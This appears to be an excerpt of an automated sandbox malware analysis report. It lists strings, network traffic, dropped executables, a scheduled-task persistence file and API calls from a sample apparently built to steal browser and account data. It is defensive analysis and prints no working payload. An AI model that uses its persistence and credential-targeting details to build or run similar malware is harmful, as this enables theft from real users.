Source: softokn3[1].dll.7.dr, mozglue.dll.7.dr, nss3[1].dll.7.dr, freebl3.dll.7.dr, freebl3[1].dll.7.dr, mozglue[1].dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: softokn3[1].dll.7.dr, mozglue.dll.7.dr, nss3[1].dll.7.dr, freebl3.dll.7.dr, freebl3[1].dll.7.dr, mozglue[1].dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: softokn3[1].dll.7.dr, mozglue.dll.7.dr, nss3[1].dll.7.dr, freebl3.dll.7.dr, freebl3[1].dll.7.dr, mozglue[1].dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: softokn3[1].dll.7.dr, mozglue.dll.7.dr, nss3[1].dll.7.dr, freebl3.dll.7.dr, freebl3[1].dll.7.dr, mozglue[1].dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: softokn3[1].dll.7.dr, mozglue.dll.7.dr, nss3[1].dll.7.dr, freebl3.dll.7.dr, freebl3[1].dll.7.dr, mozglue[1].dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: eb98fe5174.exe, eb98fe5174.exe, 00000007.00000002.2669122689.000000006C94D000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.7.dr, mozglue[1].dll.7.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: eb98fe5174.exe, 00000007.00000002.2654833757.000000001D4FA000.00000004.00000020.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2668900391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: eb98fe5174.exe, 00000007.00000003.2494565892.0000000001079000.00000004.00000020.00020000.00000000.sdmp, ECBAEBGH.7.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 8eb30d7f71.exe, 00000009.00000002.2881189935.0000000001531000.00000004.00000020.00020000.00000000.sdmp, 8eb30d7f71.exe, 00000009.00000002.2881189935.0000000001508000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.c
Source: data_1.14.dr String found in binary or memory: https://arc.msn.com/v4/api/selection?placement=88000360&nct=1&fmt=json&ADEFAB=1&OPSYS=WIN10&locale=e
Source: data_1.14.dr String found in binary or memory: https://azureedge.net
Source: eb98fe5174.exe, 00000007.00000002.2662143008.0000000029431000.00000004.00000020.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp, AAAAECGHCBGCBFHIIDHI.7.dr String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: eb98fe5174.exe, 00000007.00000002.2662143008.0000000029431000.00000004.00000020.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp, AAAAECGHCBGCBFHIIDHI.7.dr String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: Reporting and NEL0.14.dr String found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
Source: eb98fe5174.exe, 00000007.00000003.2494565892.0000000001079000.00000004.00000020.00020000.00000000.sdmp, ECBAEBGH.7.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: eb98fe5174.exe, 00000007.00000003.2494565892.0000000001079000.00000004.00000020.00020000.00000000.sdmp, ECBAEBGH.7.dr, Web Data.13.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: eb98fe5174.exe, 00000007.00000003.2494565892.0000000001079000.00000004.00000020.00020000.00000000.sdmp, ECBAEBGH.7.dr, Web Data.13.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Network Persistent State0.21.dr String found in binary or memory: https://chrome.cloudflare-dns.com
Source: manifest.json.21.dr String found in binary or memory: https://chrome.google.com/webstore/
Source: manifest.json.21.dr String found in binary or memory: https://chromewebstore.google.com/
Source: manifest.json0.21.dr String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: eb98fe5174.exe, 00000007.00000002.2662143008.0000000029431000.00000004.00000020.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp, AAAAECGHCBGCBFHIIDHI.7.dr String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: eb98fe5174.exe, 00000007.00000002.2662143008.0000000029431000.00000004.00000020.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp, AAAAECGHCBGCBFHIIDHI.7.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: manifest.json0.21.dr String found in binary or memory: https://docs.google.com/
Source: manifest.json0.21.dr String found in binary or memory: https://drive-autopush.corp.google.com/
Source: manifest.json0.21.dr String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: manifest.json0.21.dr String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: manifest.json0.21.dr String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: manifest.json0.21.dr String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: manifest.json0.21.dr String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: manifest.json0.21.dr String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: manifest.json0.21.dr String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: manifest.json0.21.dr String found in binary or memory: https://drive-preprod.corp.google.com/
Source: manifest.json0.21.dr String found in binary or memory: https://drive-staging.corp.google.com/
Source: manifest.json0.21.dr String found in binary or memory: https://drive.google.com/
Source: eb98fe5174.exe, 00000007.00000003.2494565892.0000000001079000.00000004.00000020.00020000.00000000.sdmp, ECBAEBGH.7.dr, Web Data.13.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: eb98fe5174.exe, 00000007.00000003.2494565892.0000000001079000.00000004.00000020.00020000.00000000.sdmp, ECBAEBGH.7.dr, Web Data.13.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: eb98fe5174.exe, 00000007.00000003.2494565892.0000000001079000.00000004.00000020.00020000.00000000.sdmp, ECBAEBGH.7.dr, Web Data.13.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: data_1.14.dr, 000003.log6.13.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
Source: data_1.14.dr, 000003.log9.13.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
Source: AAAAECGHCBGCBFHIIDHI.7.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: softokn3[1].dll.7.dr, mozglue.dll.7.dr, nss3[1].dll.7.dr, freebl3.dll.7.dr, freebl3[1].dll.7.dr, mozglue[1].dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr String found in binary or memory: https://mozilla.org0/
Source: data_1.14.dr String found in binary or memory: https://msn.com
Source: 8eb30d7f71.exe, 00000009.00000002.2880910734.0000000001330000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/signinoptions/passwordC:
Source: HCGCBFHCFCFBFIEBGHJECGHCFI.7.dr String found in binary or memory: https://support.mozilla.org
Source: HCGCBFHCFCFBFIEBGHJECGHCFI.7.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: HCGCBFHCFCFBFIEBGHJECGHCFI.7.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: eb98fe5174.exe, 00000007.00000003.2483387429.000000001D3C0000.00000004.00000020.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2619375968.0000000000661000.00000040.00000001.01000000.00000009.sdmp, eb98fe5174.exe, 00000007.00000002.2619375968.000000000069C000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: eb98fe5174.exe, 00000007.00000002.2619375968.0000000000661000.00000040.00000001.01000000.00000009.sdmp, eb98fe5174.exe, 00000007.00000002.2619375968.000000000069C000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY
Source: eb98fe5174.exe, 00000007.00000002.2619375968.0000000000661000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV
Source: eb98fe5174.exe, 00000007.00000002.2619375968.000000000069C000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: eb98fe5174.exe, 00000007.00000002.2619375968.000000000069C000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF
Source: eb98fe5174.exe, 00000007.00000002.2619375968.000000000069C000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm
Source: eb98fe5174.exe, 00000007.00000002.2662143008.0000000029431000.00000004.00000020.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp, AAAAECGHCBGCBFHIIDHI.7.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: softokn3[1].dll.7.dr, mozglue.dll.7.dr, nss3[1].dll.7.dr, freebl3.dll.7.dr, freebl3[1].dll.7.dr, mozglue[1].dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: eb98fe5174.exe, 00000007.00000003.2494565892.0000000001079000.00000004.00000020.00020000.00000000.sdmp, ECBAEBGH.7.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: eb98fe5174.exe, 00000007.00000002.2662143008.0000000029431000.00000004.00000020.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp, AAAAECGHCBGCBFHIIDHI.7.dr String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: content_new.js.21.dr, content.js.21.dr String found in binary or memory: https://www.google.com/chrome
Source: eb98fe5174.exe, 00000007.00000003.2494565892.0000000001079000.00000004.00000020.00020000.00000000.sdmp, ECBAEBGH.7.dr, Web Data.13.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: HCGCBFHCFCFBFIEBGHJECGHCFI.7.dr String found in binary or memory: https://www.mozilla.org
Source: eb98fe5174.exe, 00000007.00000002.2619375968.000000000069C000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: HCGCBFHCFCFBFIEBGHJECGHCFI.7.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: eb98fe5174.exe, 00000007.00000002.2619375968.000000000069C000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: HCGCBFHCFCFBFIEBGHJECGHCFI.7.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: eb98fe5174.exe, 00000007.00000002.2619375968.000000000069C000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: eb98fe5174.exe, 00000007.00000003.2580930474.00000000296D0000.00000004.00000020.00020000.00000000.sdmp, HCGCBFHCFCFBFIEBGHJECGHCFI.7.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: eb98fe5174.exe, 00000007.00000002.2619375968.000000000069C000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: eb98fe5174.exe, 00000007.00000002.2619375968.000000000069C000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: HCGCBFHCFCFBFIEBGHJECGHCFI.7.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: eb98fe5174.exe, 00000007.00000002.2619375968.000000000069C000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: eb98fe5174.exe, 00000007.00000003.2580930474.00000000296D0000.00000004.00000020.00020000.00000000.sdmp, HCGCBFHCFCFBFIEBGHJECGHCFI.7.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: Top Sites.13.dr, Top Sites.21.dr String found in binary or memory: https://www.office.com/
Source: Top Sites.13.dr, Top Sites.21.dr String found in binary or memory: https://www.office.com/Office
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52620 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52618 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52617 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52615
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52619
Source: unknown Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52617
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52618
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52620
Source: unknown Network traffic detected: HTTP traffic on port 52615 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52619 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49779 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49783 version: TLS 1.2

System Summary

Source: 8eb30d7f71.exe, 00000009.00000002.2880216454.00000000005D2000.00000002.00000001.01000000.0000000B.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_847ff868-4
Source: 8eb30d7f71.exe, 00000009.00000002.2880216454.00000000005D2000.00000002.00000001.01000000.0000000B.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_7de4c594-e
Source: 8eb30d7f71.exe.6.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_00e89baa-9
Source: 8eb30d7f71.exe.6.dr String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_10856067-5
Source: random[1].exe0.6.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_c89ec19a-3
Source: random[1].exe0.6.dr String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_0884c80f-4
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name: .idata
Source: explorti.exe.0.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .rsrc
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: eb98fe5174.exe.6.dr Static PE information: section name:
Source: eb98fe5174.exe.6.dr Static PE information: section name: .rsrc
Source: eb98fe5174.exe.6.dr Static PE information: section name: .idata
Source: eb98fe5174.exe.6.dr Static PE information: section name:
Source: 53c7d901f1.exe.6.dr Static PE information: section name:
Source: 53c7d901f1.exe.6.dr Static PE information: section name: .rsrc
Source: 53c7d901f1.exe.6.dr Static PE information: section name: .idata
Source: 53c7d901f1.exe.6.dr Static PE information: section name:
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8FED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset, 7_2_6C8FED10
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C93B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 7_2_6C93B700
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C93B8C0 rand_s,NtQueryVirtualMemory, 7_2_6C93B8C0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C93B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 7_2_6C93B910
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8DF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 7_2_6C8DF280
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CB062C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy, 7_2_6CB062C0
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00AFE440 6_2_00AFE440
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00AF4CF0 6_2_00AF4CF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00B33068 6_2_00B33068
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00B27D83 6_2_00B27D83
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00AF4AF0 6_2_00AF4AF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00B3765B 6_2_00B3765B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00B32BD0 6_2_00B32BD0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00B38720 6_2_00B38720
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00B36F09 6_2_00B36F09
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00B3777B 6_2_00B3777B
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8D35A0 7_2_6C8D35A0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8E6C80 7_2_6C8E6C80
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9334A0 7_2_6C9334A0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C93C4A0 7_2_6C93C4A0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8E64C0 7_2_6C8E64C0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8FD4D0 7_2_6C8FD4D0
